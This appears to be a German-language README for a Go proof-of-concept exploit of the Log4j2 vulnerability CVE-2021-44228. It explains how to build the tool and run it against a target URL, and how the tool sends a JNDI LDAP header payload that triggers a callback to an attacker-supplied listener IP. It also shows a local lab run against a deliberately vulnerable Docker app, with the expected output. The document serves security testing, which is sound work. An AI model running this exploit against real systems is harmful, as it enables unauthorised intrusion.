
Ein einfacher Log4j PoC geschrieben in Go
⚠️ Haftungsausschluss:
Dieses Tool ist ausschließlich für Bildungszwecke, Sicherheitsforschung und kontrollierte Testumgebungen bestimmt.
Die Nutzung gegen Systeme ohne ausdrückliche Erlaubnis ist illegal und liegt vollständig in der Verantwortung des Benutzers.
Dieses Projekt enthält einen einfachen Proof-of-Concept (PoC)-Exploit für die Apache Log4j2 (CVE-2021-44228)-Sicherheitslücke.
Der PoC sendet einen speziell präparierten HTTP-Header mit einer JNDI LDAP-Nutzlast an das Ziel.
Wenn das Ziel angreifbar ist, sendet es einen Callback an die angegebene LHOST-Adresse.
go build -o exploit exploit.go
sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
-r → Ziel-URL (Endpunkt der angreifbaren Anwendung)-l → Ihre Callback-Listener-IP-Adresse (der Rechner, auf dem der PoC läuft)Mit der bereitgestellten Docker-verwundbaren App:
# Verwundbare App ausführen
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app
# Exploit ausführen
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1
Erwartete Ausgabe:
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE